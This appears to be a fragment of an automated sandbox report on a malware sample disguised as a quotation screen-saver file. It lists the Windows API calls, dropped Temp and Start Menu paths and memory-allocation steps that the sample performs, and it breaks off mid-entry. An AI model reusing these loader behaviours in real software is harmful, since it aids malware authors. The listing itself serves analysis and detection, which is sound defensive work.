                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3356406503-0
                                                                                                                  • Opcode ID: c4662aed3400953769b5cddd40b0194a522b187818b2fb74eda420b64cf76a82
                                                                                                                  • Instruction ID: 49bb908759fb8bb017d3fb13a512c1580aa25bc05373ea9f17fb9975dcb56339
                                                                                                                  • Opcode Fuzzy Hash: c4662aed3400953769b5cddd40b0194a522b187818b2fb74eda420b64cf76a82
                                                                                                                  • Instruction Fuzzy Hash: 8F11C471901209EFDB24CFA4DA685BE7AB4EF01354F20843FF442B62C0D6B84A45EB2D
                                                                                                                  APIs
                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  APIs
                                                                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040244F
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402458
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseDeleteValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2831762973-0
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryA.KERNELBASE(?,?), ref: 004059EA
                                                                                                                  • GetLastError.KERNEL32 ref: 004059F8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1375471231-0
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EE8
                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EF3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$EnableShow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1136574915-0
                                                                                                                  APIs
                                                                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422158,?,user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),?,988,00000000), ref: 00405A60
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405A6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3712363035-0
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(0001043A), ref: 00401586
                                                                                                                  • ShowWindow.USER32(00010434), ref: 0040159B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268545403-0
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000000,?,00403613,0000000C), ref: 004067D8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004067F3
                                                                                                                    • Part of subcall function 00406758: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040676F
                                                                                                                    • Part of subcall function 00406758: wsprintfA.USER32 ref: 004067A8
                                                                                                                    • Part of subcall function 00406758: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004067BC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2547128583-0
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402FA4,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405F35
                                                                                                                  • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F57
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 415043291-0
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004034C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00405A08
                                                                                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405A16
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1375471231-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2111968516-0
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402756
                                                                                                                    • Part of subcall function 004062FC: wsprintfA.USER32 ref: 00406309
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointerwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 327478801-0
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CEF,00000000,?,?), ref: 0040627B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Create
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2289755597-0
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,00413391,0040B8F8,0040340A,0040B8F8,00413391,004138F8,00004000,?,00000000,00403234,00000004), ref: 00405FEC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,004138F8,0040B8F8,00403486,0000000A,0000000A,0040338A,004138F8,00004000,?,00000000,00403234), ref: 00405FBD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNELBASE(6D43504C,00000004,00000040,6D43503C), ref: 6D4329CF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004062B2,?,?,?,?,00000000,?), ref: 00406248
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  APIs
                                                                                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015AD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(0001042E,00000000,00000000,00000000), ref: 0040449C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(00000028,?,?,004042A3), ref: 00404481
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403187,?), ref: 00403497
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  APIs
                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,0040423C), ref: 0040446A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2492992576-0
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNELBASE(00000000), ref: 6D432B87
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                    • Part of subcall function 004054E2: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                    • Part of subcall function 004054E2: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                    • Part of subcall function 00405A37: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422158,?,user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),?,988,00000000), ref: 00405A60
                                                                                                                    • Part of subcall function 00405A37: CloseHandle.KERNEL32(?), ref: 00405A6D
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC5
                                                                                                                    • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                                                                                    • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                                                                                    • Part of subcall function 004062FC: wsprintfA.USER32 ref: 00406309
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2972824698-0
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040491F
                                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404949
                                                                                                                  • SHBrowseForFolderA.SHELL32(?,0041FD28,?), ref: 004049FA
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404A05
                                                                                                                  • lstrcmpiA.KERNEL32(Call,Inaugurates Setup: Installing), ref: 00404A37
                                                                                                                  • lstrcatA.KERNEL32(?,Call), ref: 00404A43
                                                                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404A55
                                                                                                                    • Part of subcall function 00405A98: GetDlgItemTextA.USER32(?,?,00000400,00404A8C), ref: 00405AAB
                                                                                                                    • Part of subcall function 00406698: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 004066F0
                                                                                                                    • Part of subcall function 00406698: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 004066FD
                                                                                                                    • Part of subcall function 00406698: CharNextA.USER32(0000000C,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00406702
                                                                                                                    • Part of subcall function 00406698: CharPrevA.USER32(0000000C,0000000C,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00406712
                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(0041F920,?,?,0000040F,?,0041F920,0041F920,?,?,0041F920,?,?,000003FB,?), ref: 00404B13
                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404B2E
                                                                                                                    • Part of subcall function 00404C87: lstrlenA.KERNEL32(Inaugurates Setup: Installing,Inaugurates Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404BA2,000000DF,00000000,00000400,?), ref: 00404D25
                                                                                                                    • Part of subcall function 00404C87: wsprintfA.USER32 ref: 00404D2D
                                                                                                                    • Part of subcall function 00404C87: SetDlgItemTextA.USER32(?,Inaugurates Setup: Installing), ref: 00404D40
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55$Call$Inaugurates Setup: Installing
                                                                                                                  • API String ID: 2624150263-829823585
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6D4312A5: GlobalAlloc.KERNEL32(00000040,6D4312C3,?,6D43135F,-6D43504B,6D4311C0,-000000A0), ref: 6D4312AD
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6D431C54
                                                                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 6D431C9C
                                                                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 6D431CA6
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D431CB9
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D431D99
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D431D9E
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D431DA3
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D431F8A
                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 6D432128
                                                                                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 6D4321A4
                                                                                                                  • LoadLibraryA.KERNEL32(00000008), ref: 6D4321B5
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6D43220E
                                                                                                                  • lstrlenA.KERNEL32(00000408), ref: 6D432228
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33522346025.000000006D430000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                  • Associated: 00000000.00000002.33522508051.000000006D434000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                  • Associated: 00000000.00000002.33522587751.000000006D436000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 245916457-0
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.OLE32(00408410,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FD
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AF
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines, xrefs: 0040223D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines
                                                                                                                  • API String ID: 123533781-4275992298
                                                                                                                  APIs
                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027BE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1974802433-0
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404E5A
                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404E67
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404EB6
                                                                                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404ECD
                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00405456), ref: 00404EE7
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404EF9
                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404F0D
                                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404F23
                                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404F2F
                                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404F3F
                                                                                                                  • DeleteObject.GDI32(00000110), ref: 00404F44
                                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404F6F
                                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404F7B
                                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00405015
                                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00405045
                                                                                                                    • Part of subcall function 00404473: SendMessageA.USER32(00000028,?,?,004042A3), ref: 00404481
                                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00405059
                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00405087
                                                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00405095
                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 004050A5
                                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 004051A0
                                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405205
                                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040521A
                                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040523E
                                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040525E
                                                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00405273
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405283
                                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004052FC
                                                                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 004053A5
                                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004053B4
                                                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004053DF
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040542D
                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405438
                                                                                                                  • ShowWindow.USER32(00000000), ref: 0040543F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
